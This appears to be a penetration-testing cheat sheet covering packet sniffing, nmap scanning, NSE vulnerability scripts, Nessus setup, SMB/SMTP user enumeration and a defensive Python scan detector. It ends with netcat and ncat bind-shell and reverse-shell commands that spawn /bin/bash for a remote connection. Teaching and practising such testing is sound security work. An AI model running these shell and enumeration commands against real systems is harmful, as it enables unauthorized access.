
Network Penetration Testing

Scanning Steps

Network Sweeping

Network Tracing

Port Scanning

OS Fingerprinting

Version Scanning

Vulnerability Scanning

Scanning

TIPS

–When scanning systems, use IP addresses instead of domain names.
–In large scans, use the most popular ports instead of all ports, OR, if you want to scan all ports, use multiple systems to perform the full scan of the target organization.
–Run a sniffer.

Sniffers

TCPDUMP
–tcpdump -nn -X -v -i eth0 -s0
–tcpdump -nn {tcp|udp|icmp|arp|ip} {and|or|not} {port} {and|or|not} {dst|src|host} 8.8.8.8
–tcpdump -nn tcp and port 21 and host 10.0.2.5 -i eth0 -s0 -w ftp.pcapng
–tcpdump -nn -r ftp.pcapng

Wireshark
–ip.addr == 192.168.1.14
–ip.addr == 192.168.1.1 and http
–http or arp
–ip.addr == 192.168.1.1 and tcp.port == 80

Network Sweeping

Nmap does host discovery through ARP (local network), ICMP (as root), TCP SYN to port 443 and TCP ACK to port 80.
–nmap -n -sn 8.8.8.8

If the above method fails, run a normal port scan without host discovery.
–nmap -n -Pn -sS 8.8.8.8

Network Tracing

Linux traceroute uses UDP by default.
–traceroute -n 8.8.8.8 #UDP
–traceroute -I 8.8.8.8 #ICMP
–traceroute -T 8.8.8.8 #TCP

Windows tracert uses ICMP by default.
–tracert -d 8.8.8.8 #ICMP

Port Scanning

TCP three-way handshake

Port Scanning

TCP Behavior
–send=SYN, receive=SYN-ACK => Port Open
–send=SYN, receive=RST-ACK => Port Closed
–send=SYN, receive=ICMP-Port-Unreachable => Blocked by Firewall (Filtered)
–send=SYN, receive=Nothing => Blocked by Firewall (Filtered)

Port Scanning

UDP Behavior
–send=UDP, receive=UDP => Port Open
–send=UDP, receive=ICMP-Port-Unreachable => Port Closed OR Blocked by Firewall
–send=UDP, receive=Nothing => Port Closed OR Blocked by Firewall OR Port Open but the service is waiting for specific data in the UDP payload; Nmap result => (Open|Filtered)

Port Scanning

No host discovery and speed control
–nmap -Pn -T{0|1|2|3|4|5} 8.8.8.8

Scan type (SYN, Connect or UDP)
–nmap -s{S|T|U} 8.8.8.8

Scan specific ports
–nmap -p { 21,22,80,443 | 20-80 | - } 8.8.8.8
–nmap --top-ports 100 8.8.8.8

Store results in files
–nmap -oA filename 8.8.8.8

Special options
–nmap --reason 8.8.8.8
–nmap --badsum 8.8.8.8
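
The TCP Behavior table and nmap's --reason labels, seen from the sniffer side: an added defensive example (not from the slides) that parses a constructed tcpdump -nn capture, pairs each SYN with its reply, labels the port open/closed/filtered with the reason, and flags sources that probed many ports. The line format, hosts, ports and the threshold are assumptions.

```python
import re
from collections import defaultdict
# Line shapes from tcpdump -nn that we parse; the capture below is constructed, not real.
TCP_RE = re.compile(r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]*)\]")
ICMP_RE = re.compile(r"IP (\d+\.\d+\.\d+\.\d+) > (\d+\.\d+\.\d+\.\d+): ICMP \S+ tcp port (\d+) unreachable")

SAMPLE_LOG = """\
10:00:00.000 IP 10.0.2.15.40001 > 10.0.2.4.22: Flags [S], seq 1, win 1024, length 0
10:00:00.001 IP 10.0.2.4.22 > 10.0.2.15.40001: Flags [S.], seq 2, ack 2, win 64240, length 0
10:00:00.002 IP 10.0.2.15.40002 > 10.0.2.4.23: Flags [S], seq 1, win 1024, length 0
10:00:00.003 IP 10.0.2.4.23 > 10.0.2.15.40002: Flags [R.], seq 0, ack 2, win 0, length 0
10:00:00.004 IP 10.0.2.15.40003 > 10.0.2.4.443: Flags [S], seq 1, win 1024, length 0
10:00:00.005 IP 10.0.2.4 > 10.0.2.15: ICMP 10.0.2.4 tcp port 443 unreachable, length 68
10:00:00.006 IP 10.0.2.15.40004 > 10.0.2.4.8080: Flags [S], seq 1, win 1024, length 0
10:00:00.007 IP 10.0.2.15.40005 > 10.0.2.4.3389: Flags [S], seq 1, win 1024, length 0
10:00:00.008 IP 10.0.2.4.3389 > 10.0.2.15.40005: Flags [R.], seq 0, ack 2, win 0, length 0
"""

def classify_probes(log_text):
    """Pair each SYN with its answer and label the port as the TCP Behavior table does.
    Returns {(scanner, target): {dport: (state, reason)}}, reasons named like nmap --reason."""
    probes = {}  # (scanner, sport, target, dport) -> (state, reason)
    for line in log_text.splitlines():
        m = TCP_RE.search(line)
        if m:
            src, sport, dst, dport, flags = m.groups()
            if flags == "S":                       # bare SYN: a new probe, unanswered so far
                probes.setdefault((src, sport, dst, dport), ("filtered", "no-response"))
                continue
            back = (dst, dport, src, sport)        # a reply reverses the 4-tuple
            if back in probes:
                if "S" in flags and "." in flags:  # SYN-ACK => open
                    probes[back] = ("open", "syn-ack")
                elif "R" in flags:                 # RST or RST-ACK => closed
                    probes[back] = ("closed", "reset")
            continue
        m = ICMP_RE.search(line)
        if m:                                      # ICMP port unreachable => filtered
            target, scanner, port = m.groups()
            for k in probes:
                if k[0] == scanner and k[2] == target and k[3] == port:
                    probes[k] = ("filtered", "port-unreach")
    by_pair = defaultdict(dict)
    for (src, _, dst, dport), verdict in probes.items():
        by_pair[(src, dst)][int(dport)] = verdict
    return dict(by_pair)

def flag_sweeps(by_pair, threshold=5):  # scanner/target pairs that probed >= threshold ports
    return sorted(pair for pair, ports in by_pair.items() if len(ports) >= threshold)
```

Feed it `tcpdump -nn -r file.pcap` output instead of SAMPLE_LOG to review a real capture; a source hitting many ports with mostly reset or no-response verdicts is the SYN-scan signature the slides describe.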


OS Fingerprinting & Version Scanning

OS Fingerprinting
–nmap -O 8.8.8.8

Version Scanning
–nmap -sV 8.8.8.8
–nmap -A 8.8.8.8 #A = -sV -O -sC

Vulnerability Scanning

Nmap Scripting Engine (NSE)
–ls /usr/share/nmap/scripts/
–nmap -sC 8.8.8.8
–nmap --script=http-robots.txt.nse -p80 8.8.8.8
–nmap -p 80 --script=http-vuln-cve2010-2861.nse 192.168.1.1
–nmap -p 21 --script=ftp-anon.nse 192.168.1.1
–nmap -p 139,445 --script=smb-security-mode.nse 192.168.1.1
–nmap -p 139,445 --script=smb* 192.168.1.1
–nmap --script=smb-os-discovery.nse 10.0.2.5
–nmap --script=dns-zone-transfer -p 53 zonetransfer.me

Vulnerability Scanning

Nessus
–https://www.tenable.com/downloads/nessus
–dpkg -i Nessus-6.9.4-debian6_amd64.deb
–service nessusd start
–update-rc.d nessusd enable
–https://localhost:8834/

Enumerating Users

SMB
–NULL session
  rpcclient -U "" -N 10.0.2.4
  –enumdomusers
  –queryuser 0x3e8
–Session with username and password
  rpcclient -U "test" 10.0.2.4
–Enum4Linux
  enum4linux 10.0.2.4
  enum4linux -u "test" -p "test" 10.0.2.4

SMTP
–telnet 192.168.1.104 25
  VRFY msfadmin
–smtp-user-enum -M VRFY -U users.txt -t 192.168.1.104

Netcat & Ncat

Find open ports
–nc -nv 127.0.0.1 21
–nc -vz 127.0.0.1 21
–nc -v 127.0.0.1 21
–timeout 1 nc -v 127.0.0.1 21

Chat using nc
–nc -nlvp 4444 #on server
–nc -nv 127.0.0.1 4444 #on client

Bind shell
–nc -nlvp 4444 -e /bin/bash (cmd.exe) #on target
–nc -nv 127.0.0.1 4444 #on attacker

Reverse shell
–nc -nlvp 4444 #on attacker
–nc -nv 127.0.0.1 4444 -e /bin/bash (cmd.exe) #on target

Ncat
–ncat --exec /bin/bash (cmd.exe) --allow 127.0.0.1 -vnl 4444 --ssl
–ncat -v 127.0.0.1 4444 --ssl